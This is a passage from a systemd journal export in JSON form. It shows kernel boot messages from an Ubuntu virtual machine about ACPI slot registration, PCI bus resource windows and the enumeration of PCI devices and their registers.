"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "258131", "MESSAGE" : "acpiphp: Slot [30] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=eb;b=e2b08827b5804427b422c10c84f1567e;m=558dfa;t=5bd16dd190d62;x=25bff900685e8418", "__REALTIME_TIMESTAMP" : "1615280779890018", "__MONOTONIC_TIMESTAMP" : "5606906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "260055", "MESSAGE" : "acpiphp: Slot [31] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ec;b=e2b08827b5804427b422c10c84f1567e;m=558e04;t=5bd16dd190d6b;x=362eeb39cc63ada1", "__REALTIME_TIMESTAMP" : "1615280779890027", "__MONOTONIC_TIMESTAMP" : "5606916", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "262384", "MESSAGE" : "PCI host bridge to bus 0000:00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ed;b=e2b08827b5804427b422c10c84f1567e;m=558e88;t=5bd16dd190df0;x=d8bbcd0964c6b88c", "__REALTIME_TIMESTAMP" : "1615280779890160", "__MONOTONIC_TIMESTAMP" : "5607048", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "264008", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ee;b=e2b08827b5804427b422c10c84f1567e;m=558f03;t=5bd16dd190e6b;x=e61b00e29112adb0", "__REALTIME_TIMESTAMP" : "1615280779890283", "__MONOTONIC_TIMESTAMP" : "5607171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "267267", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ef;b=e2b08827b5804427b422c10c84f1567e;m=558f82;t=5bd16dd190eea;x=ac0fa8a1df325f3e", "__REALTIME_TIMESTAMP" : "1615280779890410", "__MONOTONIC_TIMESTAMP" : "5607298", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "268006", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f0;b=e2b08827b5804427b422c10c84f1567e;m=558feb;t=5bd16dd190f52;x=8a9860fa2fdb0675", "__REALTIME_TIMESTAMP" : "1615280779890514", "__MONOTONIC_TIMESTAMP" : "5607403", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "271763", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f1;b=e2b08827b5804427b422c10c84f1567e;m=559089;t=5bd16dd190ff1;x=ca588a5d05c5e3a", "__REALTIME_TIMESTAMP" : "1615280779890673", "__MONOTONIC_TIMESTAMP" : "5607561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "272007", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f2;b=e2b08827b5804427b422c10c84f1567e;m=559118;t=5bd16dd19107f;x=248c379e0cd43533", "__REALTIME_TIMESTAMP" : "1615280779890815", "__MONOTONIC_TIMESTAMP" : "5607704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "275812", "MESSAGE" : "pci_bus 0000:00: root bus resource [bus 00-ff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f3;b=e2b08827b5804427b422c10c84f1567e;m=5591da;t=5bd16dd191141;x=ecd27e88c67f76bf", "__REALTIME_TIMESTAMP" : "1615280779891009", "__MONOTONIC_TIMESTAMP" : "5607898", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276064", "MESSAGE" : "pci 0000:00:00.0: [8086:1237] type 00 class 0x060000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f4;b=e2b08827b5804427b422c10c84f1567e;m=55d23a;t=5bd16dd1951a2;x=9ccf81605d5f9c41", "__REALTIME_TIMESTAMP" : "1615280779907490", "__MONOTONIC_TIMESTAMP" : "5624378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "276813", "MESSAGE" : "pci 0000:00:01.0: [8086:7000] type 00 class 0x060100" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f5;b=e2b08827b5804427b422c10c84f1567e;m=55d2d6;t=5bd16dd19523d;x=60d223400918274a", "__REALTIME_TIMESTAMP" : "1615280779907645", "__MONOTONIC_TIMESTAMP" : "5624534", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "277719", "MESSAGE" : "pci 0000:00:01.1: [8086:7010] type 00 class 0x010180" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f6;b=e2b08827b5804427b422c10c84f1567e;m=55d372;t=5bd16dd1952d9;x=dd7e66bae818543a", "__REALTIME_TIMESTAMP" : "1615280779907801", "__MONOTONIC_TIMESTAMP" : "5624690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "280911", "MESSAGE" : "pci 0000:00:01.1: reg 0x20: [io 0xc0c0-0xc0cf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f7;b=e2b08827b5804427b422c10c84f1567e;m=55d435;t=5bd16dd19539d;x=f8e2ac9466ff5f98", "__REALTIME_TIMESTAMP" : "1615280779907997", "__MONOTONIC_TIMESTAMP" : "5624885", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "282217", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f8;b=e2b08827b5804427b422c10c84f1567e;m=55d4e3;t=5bd16dd19544a;x=a17099c37dea2ab9", "__REALTIME_TIMESTAMP" : "1615280779908170", "__MONOTONIC_TIMESTAMP" : "5625059", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "284007", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f9;b=e2b08827b5804427b422c10c84f1567e;m=55d569;t=5bd16dd1954d0;x=3778f35692f3b203", "__REALTIME_TIMESTAMP" : "1615280779908304", "__MONOTONIC_TIMESTAMP" : "5625193", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "287935", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fa;b=e2b08827b5804427b422c10c84f1567e;m=55d5fe;t=5bd16dd195566;x=7a2bf3739926c36d", "__REALTIME_TIMESTAMP" : "1615280779908454", "__MONOTONIC_TIMESTAMP" : "5625342", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "288006", "MESSAGE" : "pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fb;b=e2b08827b5804427b422c10c84f1567e;m=55d683;t=5bd16dd1955ea;x=3ea7c3e0f893caac", "__REALTIME_TIMESTAMP" : "1615280779908586", "__MONOTONIC_TIMESTAMP" : "5625475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "291842", "MESSAGE" : "pci 0000:00:01.2: [8086:7020] type 00 class 0x0c0300" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fc;b=e2b08827b5804427b422c10c84f1567e;m=55d6fc;t=5bd16dd195664;x=cc7b8675d98e90b5", "__REALTIME_TIMESTAMP" : "1615280779908708", "__MONOTONIC_TIMESTAMP" : "5625596", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "294288", "MESSAGE" : "pci 0000:00:01.2: reg 0x20: [io 0xc080-0xc09f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fd;b=e2b08827b5804427b422c10c84f1567e;m=55d775;t=5bd16dd1956dd;x=bb7c0f76dca68866", "__REALTIME_TIMESTAMP" : "1615280779908829", "__MONOTONIC_TIMESTAMP" : "5625717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "295835", "MESSAGE" : "pci 0000:00:01.3: [8086:7113] type 00 class 0x068000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=fe;b=e2b08827b5804427b422c10c84f1567e;m=55d831;t=5bd16dd195799;x=4a4b68dabe7c021a", "__REALTIME_TIMESTAMP" : "1615280779909017", "__MONOTONIC_TIMESTAMP" : "5625905", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "296549", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0600-0x063f] claimed by PIIX4 ACPI" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ff;b=e2b08827b5804427b422c10c84f1567e;m=55d8b5;t=5bd16dd19581d;x=4f9eb59d248eeca9", "__REALTIME_TIMESTAMP" : "1615280779909149", "__MONOTONIC_TIMESTAMP" : "5626037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.3", "_UDEV_SYSNAME" : "0000:00:01.3", "_SOURCE_MONOTONIC_TIMESTAMP" : "300020", "MESSAGE" : "pci 0000:00:01.3: quirk: [io 0x0700-0x070f] claimed by PIIX4 SMB" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=100;b=e2b08827b5804427b422c10c84f1567e;m=55f34b;t=5bd16dd1972b2;x=9672743b62d46b09", "__REALTIME_TIMESTAMP" : "1615280779915954", "__MONOTONIC_TIMESTAMP" : "5632843", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "304343", "MESSAGE" : "pci 0000:00:02.0: [1013:00b8] type 00 class 0x030000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=101;b=e2b08827b5804427b422c10c84f1567e;m=55f3d4;t=5bd16dd19733b;x=dad091db668fefa1", "__REALTIME_TIMESTAMP" : "1615280779916091", "__MONOTONIC_TIMESTAMP" : "5632980", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "306361", "MESSAGE" : "pci 0000:00:02.0: reg 0x10: [mem 0xfc000000-0xfdffffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=102;b=e2b08827b5804427b422c10c84f1567e;m=55f460;t=5bd16dd1973c7;x=b848ec1593b0e0b2", "__REALTIME_TIMESTAMP" : "1615280779916231", "__MONOTONIC_TIMESTAMP" : "5633120", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "307479", "MESSAGE" : "pci 0000:00:02.0: reg 0x14: [mem 0xfeb90000-0xfeb90fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=103;b=e2b08827b5804427b422c10c84f1567e;m=55f4d9;t=5bd16dd197440;x=cd2a284651410bdd", "__REALTIME_TIMESTAMP" : "1615280779916352", "__MONOTONIC_TIMESTAMP" : "5633241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "315528", "MESSAGE" : "pci 0000:00:02.0: reg 0x30: [mem 0xfeb80000-0xfeb8ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=104;b=e2b08827b5804427b422c10c84f1567e;m=55ff5b;t=5bd16dd197ec3;x=d559f12bdc4d3a18", "__REALTIME_TIMESTAMP" : "1615280779919043", "__MONOTONIC_TIMESTAMP" : "5635931", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "316278", "MESSAGE" : "pci 0000:00:03.0: [1af4:1000] type 00 class 0x020000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=105;b=e2b08827b5804427b422c10c84f1567e;m=560065;t=5bd16dd197fcd;x=c1318bc350a41dce", "__REALTIME_TIMESTAMP" : "1615280779919309", "__MONOTONIC_TIMESTAMP" : "5636197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "318019", "MESSAGE" : "pci 0000:00:03.0: reg 0x10: [io 0xc000-0xc03f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=106;b=e2b08827b5804427b422c10c84f1567e;m=560c8d;t=5bd16dd198bf5;x=3790925f3d37d293", "__REALTIME_TIMESTAMP" : "1615280779922421", "__MONOTONIC_TIMESTAMP" : "5639309", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "319363", "MESSAGE" : "pci 0000:00:03.0: reg 0x14: [mem 0xfeb91000-0xfeb91fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=107;b=e2b08827b5804427b422c10c84f1567e;m=561022;t=5bd16dd198f8a;x=9a96e7085dc5526d", "__REALTIME_TIMESTAMP" : "1615280779923338", "__MONOTONIC_TIMESTAMP" : "5640226", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "324685", "MESSAGE" : "pci 0000:00:03.0: reg 0x20: [mem 0xfe000000-0xfe003fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=108;b=e2b08827b5804427b422c10c84f1567e;m=5610ab;t=5bd16dd199012;x=258d5893ee7cb072", "__REALTIME_TIMESTAMP" : "1615280779923474", "__MONOTONIC_TIMESTAMP" : "5640363", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:03.0", "_UDEV_SYSNAME" : "0000:00:03.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "325809", "MESSAGE" : "pci 0000:00:03.0: reg 0x30: [mem 0xfeb00000-0xfeb7ffff pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=109;b=e2b08827b5804427b422c10c84f1567e;m=56145b;t=5bd16dd1993c3;x=a445db786e25b7ff", "__REALTIME_TIMESTAMP" : "1615280779924419", "__MONOTONIC_TIMESTAMP" : "5641307", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "326787", "MESSAGE" : "pci 0000:00:04.0: [1af4:1001] type 00 class 0x010000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10a;b=e2b08827b5804427b422c10c84f1567e;m=5614e0;t=5bd16dd199447;x=953a051cf3c0a2f0", "__REALTIME_TIMESTAMP" : "1615280779924551", "__MONOTONIC_TIMESTAMP" : "5641440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "328007", "MESSAGE" : "pci 0000:00:04.0: reg 0x10: [io 0xc040-0xc07f]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10b;b=e2b08827b5804427b422c10c84f1567e;m=56155a;t=5bd16dd1994c1;x=eca6999d82627363", "__REALTIME_TIMESTAMP" : "1615280779924673", "__MONOTONIC_TIMESTAMP" : "5641562", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", 